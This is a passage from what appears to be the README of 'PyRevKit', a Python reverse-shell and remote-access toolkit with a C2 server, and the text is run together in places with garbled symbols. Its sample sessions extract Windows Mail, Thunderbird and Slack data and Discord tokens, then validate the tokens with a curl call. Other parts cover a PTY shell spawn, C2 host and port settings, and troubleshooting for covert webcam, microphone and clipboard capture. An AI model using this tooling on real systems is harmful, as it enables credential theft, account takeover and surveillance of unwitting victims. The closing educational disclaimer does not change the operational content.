Location: C:\Users\jdoe\AppData\Local\Comms\UnistoreDBBe aware that many messaging apps now connect remotely without storing messages locally, so emails may not be extractable.
# Export Windows Mail database via VSS
>>> msg windows_mail_export
[*] Extracting windows_mail_export data...
[β] Message Extraction - WINDOWS_MAIL_EXPORT
ββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β WINDOWS MAIL DATABASE EXPORTED β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Method: Volume Shadow Copy (VSS)
Filename: windows_mail_export_20260413_181541.zip
Location: downloads\windows_mail_export_20260413_181541.zip
Files Archived: 8
Original Size: 27.21 MB
ZIP Size: 0.37 MB
Compression: 98.7%
π‘ Download with:
>>> download windows_mail_export_20260413_181541.zip>>> msg thunderbird
[*] Extracting thunderbird data...
[β] Message Extraction - EMAIL_THUNDERBIRD
βββ THUNDERBIRD MAIL FOLDERS βββ
Folders Found: 4
1. Inbox
Path: /home/jdoe/.thunderbird/r4k2m9lp.default/Mail/Local Folders/Inbox
Size: 2145.67 KB
2. Sent
Path: /home/jdoe/.thunderbird/r4k2m9lp.default/Mail/Local Folders/Sent
Size: 876.34 KB
3. Archives
Path: /home/jdoe/.thunderbird/r4k2m9lp.default/Mail/Local Folders/Archives
Size: 8934.11 KB
4. Drafts
Path: /home/jdoe/.thunderbird/r4k2m9lp.default/Mail/Local Folders/Drafts
Size: 43.20 KB
Note: Mail folders found - use download to retrieve mbox files
π‘ Download a folder with:
>>> download /home/jdoe/.thunderbird/r4k2m9lp.default/Mail/Local Folders/Inbox>>> msg discord
[*] Extracting discord data...
[β] Message Extraction - DISCORD
βββ DISCORD LOCAL STORAGE βββ
Tokens Found: 2
Token 1: NzE4NDk2MzI4NDk2MzI4NA.Xx1aZQ.k7dG2f9mNpQrVsLwYhTjBc3eKu8
Token 2: ODIxNzM0NTY3ODkwMTIzNg.Yy2bAR.m9eH3g0nOpRwWtMxZiUkCd4fLv9
Note: Discord tokens found in Local Storage
β οΈ Tokens grant full account access - treat as credentials
π‘ Validate token with Discord API:
curl -H "Authorization: <token>" https://discord.com/api/v9/users/@me>>> msg slack
[*] Extracting slack data...
[β] Message Extraction - SLACK
βββ SLACK DATA LOCATIONS βββ
Locations Found: 2
1. Path: /home/jdoe/.config/Slack/storage
Note: Slack data found - contains tokens and workspace info
2. Path: /home/jdoe/.config/Slack/Cookies
Note: Slack data found - contains tokens and workspace info
π‘ Download Slack storage with:
>>> download /home/jdoe/.config/Slack/storage# Switch to PowerShell (Windows)
>>> shell powershell
[*] Checking shell upgrade: powershell
[β] Shell Upgrade Check - POWERSHELL
PowerShell available - use 'powershell -Command <cmd>' for PowerShell commands
>>> powershell -Command ls
Directory: C:\Users\jdoe\revshell
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2026-04-13 6:16 PM downloads
-a---- 2026-04-06 2:57 PM 204286 pyrev_target.py# Switch to Bash (Linux/macOS)
>>> shell bash
[*] Checking shell upgrade: bash
[β] Shell Upgrade Check - BASH
Bash available - shell commands will use bash
>>> bash -c "id && hostname"
uid=1000(jdoe) gid=1000(jdoe) groups=1000(jdoe),4(adm),27(sudo)
prod-linux-01# Switch to Zsh
>>> shell zsh
[*] Checking shell upgrade: zsh
[β] Shell Upgrade Check - ZSH
Zsh available - use 'zsh -c <cmd>' for zsh commands
>>> zsh -c "echo $ZSH_VERSION && whoami"
5.9
jdoe# Check Python availability
>>> shell python
[*] Checking shell upgrade: python
[β] Shell Upgrade Check - PYTHON
Python 3.10.11 (tags/v3.10.11:7d4cc5a, Apr 5 2023, 00:38:17) [MSC v.1929 64 bit (AMD64)] available at C:\Users\jdoe\AppData\Local\Programs\Python\Python310\python.exe - use 'python -c <code>' for Python commands
>>> python -c malicious_script.py# PTY upgrade info (Linux/macOS)
>>> shell pty
[*] Checking shell upgrade: pty
[β] Shell Upgrade Check - PTY
PTY module available - full TTY shell upgrade possible (not implemented in this version)
βΉοΈ PTY upgrade not yet active in this version of PyRevKit
π‘ To get a full interactive TTY shell manually, run on the target:
python3 -c "import pty; pty.spawn('/bin/bash')"Edit pyrev_server.py constants:
LOOT_DIR = "loot" # Directory for downloaded files
PAYLOADS_DIR = "payloads" # Directory for payloads to upload
CREDS_FILE = "credentials.json"Edit pyrev_target.py header:
TARGET_ID = "machineA" # Unique identifier
SERVER_HOST = "192.168.2.110" # C2 server address
SERVER_PORT = 8765 # C2 server port
AUTO_LOGIN = "" # Set for autonomous mode
AUTO_PASSWORD = "" # Set for autonomous mode
DOWNLOAD_DIR = "downloads" # Received files directoryEdit pyrev_client.py constants:
OP_ID = "operator1" # Operator identifier- For Educational/Authorized Use Only: Only use on systems you own or have explicit permission to test
- Credential Storage: Passwords are hashed but stored on disk
Problem: [ERROR] Connection rejected
Solution:
# Verify server is running
netstat -tulpn | grep 8765
# Check firewall
sudo ufw allow 8765/tcp
# Verify certificate exists
ls -l server.pemProblem: Authentication failed
Solution:
# Verify credentials exist
cat credentials.json
# Re-add credentials
python pyrev_server.py -creds target machineA NewPassword123
# Check for typos in login/passwordProblem: [β] File not found
Solution:
# For download: verify file exists on target
>>> ls /path/to/file
# For upload: verify file in payloads/
ls -l payloads/Problem: [β] File too large
Solution: Files over ~50MB are rejected. Compress or split the file:
# On target
tar -czf archive.tar.gz large_directory/
>>> download archive.tar.gzProblem: [β] OpenCV not installed
Solution:
# On target machine
pip install opencv-pythonProblem: [β] Cannot access webcam
Solutions:
- Close other applications using the webcam
- Verify webcam is connected:
ls /dev/video*(Linux) - Check user permissions:
sudo usermod -a -G video $USER(Linux)
Problem: [β] Audio libraries not installed
Solution:
# On target machine
pip install sounddevice scipy numpy
# Linux may also need
sudo apt-get install portaudio19-dev python3-devProblem: Audio recording fails or is silent
Solutions:
- Check microphone is not muted
- Verify default audio device:
python -c "import sounddevice as sd; print(sd.query_devices())"
Problem: No results found when files clearly exist
Solutions:
- Check file permissions (target may not have access)
- Increase limit:
search *.pdf --limit 500 - Verify pattern syntax (case-insensitive)
- Try broader pattern:
search *password*
Problem: Content search returns too many results
Solutions:
- Use more specific search term
- Adjust limit:
search --content "exact_phrase" --limit 50
Problem: Search is slow
Solution: This is normal for large filesystems. Consider:
- Reducing limit:
--limit 100 - Searching specific file types only
- Being more specific with patterns
Problem: [β] Clipboard library not installed
Solution:
# On target machine
pip install pyperclipProblem: [β] Clipboard read timeout
Solutions:
- Linux: Install clipboard tools
sudo apt-get install xclip # For X11 sudo apt-get install wl-clipboard # For Wayland
- Verify graphical environment:
echo $DISPLAY(should show:0or similar) - Not supported on headless servers
Problem: Clipboard command hangs
Solution:
- Update to latest version (timeout protection added)
- Run diagnostic:
python test_clipboard.pyon target - Ensure target is not headless
Problem: Clipboard works but returns empty
Solutions:
- Clipboard is actually empty
- Clipboard contains non-text data (images, files)
- Copy some text manually and try again
Problem: Some information missing in sysinfo output
Solution: This is normal. Information availability depends on:
- Operating system
- User permissions
- Python version
No fix needed - system provides what it can access.
Windows:
- All features work out of the box after installing dependencies
- Clipboard works without additional tools
- Webcam LED may turn on during capture
Linux:
- Webcam requires user in
videogroup - Audio requires user in
audiogroup - Clipboard requires
xclip(X11) orwl-clipboard(Wayland) - Headless servers: media and clipboard features unavailable
macOS:
- All features work natively
- First use requires permission prompts (webcam, microphone, clipboard)
- Clipboard uses native
pbcopy/pbpaste
This proof of concept (PoC) is provided for educational purposes only. Unauthorized access to computer systems is illegal. The authors assume no liability and are not responsible for any misuse or damage caused by this program. Use responsibly and only on systems you own or have explicit permission to test.
This project is licensed under the MIT License - see the LICENSE file for details.
β If you find this project useful, please consider giving it a star!